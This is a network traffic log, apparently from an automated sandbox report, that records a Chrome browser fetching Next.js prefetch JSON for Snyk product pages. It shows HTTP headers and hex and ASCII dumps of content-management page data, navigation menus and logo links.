                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6f 72 67 61 6e 69 73 6d 55 69 43 61 72 64 47 72 69 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 53 6e 79 6b 20 43 6f 6e 74 61 69 6e 65 72 20 69 6e 74 65 67 72 61 74 69 6f 6e 73 5c
                                                                                                                                                                                                                                                                                                              Data Ascii: ":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":9,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"organismUiCardGrid"}},"locale":"en-US"},"fields":{"internalName":"\"Snyk Container integrations\
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC1125INData Raw: 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 32 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 54 65 78 74 47 72 69 64 49 74 65 6d 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 53 6f 66 74 77 61 72 65 20 74 72 61 6e 73 70 61 72 65 6e 63 79 5c 22 20 2d 20 74 65 78 74 20 67 72 69 64 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 53
                                                                                                                                                                                                                                                                                                              Data Ascii: Link","linkType":"Environment"}},"publishedVersion":11,"revision":2,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeTextGridItem"}},"locale":"en-US"},"fields":{"internalName":"\"Software transparency\" - text grid","headline":"S
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 6f 72 67 61 6e 69 73 6d 50 72 6f 64 75 63 74 50 72 69 63 69 6e 67 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 53 6e 79 6b 20 43 6f 6e 74 61 69 6e 65 72 20 70 72 6f 64 75 63 74 20 70 72 69 63 69 6e 67 20 63 61 72 64 73 22 2c 22 73 65 63 74 69 6f 6e 49 6e 74 72 6f 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"organismProductPricing"}},"locale":"en-US"},"fields":{"internalName":"Snyk Container product pricing cards","sectionIntro":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 22 6c 69 67 68 74 2d 62 75 6c 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: "light-bul
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 62 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6c 54 38 32 77 74 6e 4c 6a 50 52 41 30 78 58 44 72 4a 51 4e 66 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 5a 64 63 52 6e 69 66 58 73 38 41 42 36 64 7a 44 4c 50 6b 42 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000b"}}}]}}]}},{"sys":{"id":"lT82wtnLjPRA0xXDrJQNf","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"1wZdcRnifXs8AB6dzDLPkB","__typename":"Sys"}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 5f 5f 74 79 70 65 6e 61 6d 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: __typename
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC5587INData Raw: 30 30 30 30 31 35 43 37 0d 0a 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 67 69 74 68 75 62 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 69 43 32 61 61 54 37 4f 71 71 76 75 35 77 68 64 71 70 62 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 6e 70 6d 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 70 6d 6a 73 2e 63 6f 6d 2f 70 61 63 6b 61 67 65 2f 73 6e 79 6b 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 000015C7":"ContentNavigationItem","label":"github","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              60192.168.2.54978123.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC685OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json?slug=product&slug=infrastructure-as-code-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"43dnmi6kfg1n5m"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::zbkck-1729799346991-e30bd517e9fb
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:07 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60c27
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC15733INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 69 36 57 64 4c 64 52 59 65 44 41 35 69 4f 34 4b 4a 41 4b 4d 62 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 31 54 30 35 3a 32 38 3a 32 33 2e 35 30 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 36 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2i6WdLdRYeDA5iO4KJAKMb","type":"Entry","createdAt":"2022-10-21T05:28:23.507Z","updatedAt":"2024-07-26T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC15933INData Raw: 36 30 35 38 34 38 2f 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 61 77 73 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 2c 22 6c 6f 67 6f 49 63 6f 6e 4f 6e 6c 79 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 37 36 30 35 38 34 38 2f 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 61 77 73 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 36 31 35 31 2c 22 77 69 64 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 605848/website-customer-logos/logo-aws.svg","resource_type":"image","raw_transformation":""}],"logoIconOnly":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1677605848/website-customer-logos/logo-aws.svg","tags":[],"type":"upload","bytes":6151,"widt
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 65 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d 73 70 6f 74 2d 73 6e 79 6b 2d 69 73 73 75 65 2d 73 75 6d 6d 61 72 79 2d 72 65 70 6f 72 74 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 34 30 33 34 37 33 2c 22 77 69 64 74 68 22 3a 36 31 39 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 33 39 36 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 39 39 36 33 33 39 35 34 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 7d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 65 62 73 69 74 65 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: e-illustration-ui/illustration-ui-spot-snyk-issue-summary-report.svg","tags":[],"type":"upload","bytes":403473,"width":619,"format":"svg","height":396,"version":1699633954,"duration":null,"metadata":{},"public_id":"website-illustration-ui/illustration-ui-
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC1114INData Raw: 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 69 76 63 42 65 6b 54 63 61 4b 38 33 68 48 6d 6e 79 73 39 61 76 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 34 2d 31 30 54 31 36 3a 33 33 3a 30 34 2e 36 34 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 36 54 31 33 3a 31 35 3a 35 35 2e 32 34 33 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6ivcBekTcaK83hHmnys9av","type":"Entry","createdAt":"2024-04-10T16:33:04.648Z","updatedAt":"2024-07-26T13:15:55.243Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3a 7b 22 63 6f 6c 6f 72 53 63 68 65 6d 65 22 3a 22 64 61 72 6b 2d 70 75 72 70 6c 65 22 7d 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 22 6d 65 6e 75 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 22 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 4c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 61 63 74 69 6f 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 45 62 67 72 6d 6d 67 55 56 49 72 55 32 76 50 65 67 33 4d 4d 35 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000:{"colorScheme":"dark-purple"}}}}]}}]}},"menu":{"__typename":"NavigationPrimary","customLogo":null,"customLogoLink":null,"actions":{"__typename":"NavigationPrimaryActionsCollection","items":[{"sys":{"id":"1EbgrmmgUVIrU2vPeg3MM5","__typename":"Sy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 6f 6e 22 2c 22 69 74 65 6d 73 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: on","items
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC11152INData Raw: 30 30 30 30 32 42 38 34 0d 0a 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 6b 35 51 66 6e 68 36 71 4a 39 35 6b 65 31 41 46 39 55 5a 38 65 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00002B84":[{"sys":{"id":"7k5Qfnh6qJ95ke1AF9UZ8e","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCollection","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              61192.168.2.54980923.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC647OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json?slug=product&slug=snyk-apprisk HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ktudzthjl41hf3"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::kmr4t-1729799347937-31860dc6d7a8
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799347.1f60d68
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC15752INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 4d 4f 78 4d 34 74 50 72 4d 65 75 61 68 62 63 43 6e 49 55 67 73 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 31 32 54 31 32 3a 34 33 3a 34 37 2e 33 37 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 32 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3MOxM4tPrMeuahbcCnIUgs","type":"Entry","createdAt":"2023-12-12T12:43:47.376Z","updatedAt":"2024-05-21T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC15971INData Raw: 30 31 54 31 31 3a 34 35 3a 30 37 2e 33 30 31 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 38 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 4c 6f 67 6f 50 61 72 61 64 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 01T11:45:07.301Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":18,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeLogoParade"}},"locale":"en-US"},"fields":{"interna
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 73 73 2d 73 79 6e 63 2f 6c 6f 67 6f 2d 64 79 6e 61 74 72 61 63 65 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 2c 22 69 73 43 75 73 74 6f 6d 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 50 61 72 74 6e 65 72 22 3a 66 61 6c 73 65 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 6e 59 6e 5a 6e 63 4b 33 53 6c 53 50 4b 57 5a
                                                                                                                                                                                                                                                                                                              Data Ascii: ss-sync/logo-dynatrace.svg","resource_type":"image","raw_transformation":""}],"isCustomer":false,"isPartner":false}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7nYnZncK3SlSPKWZ
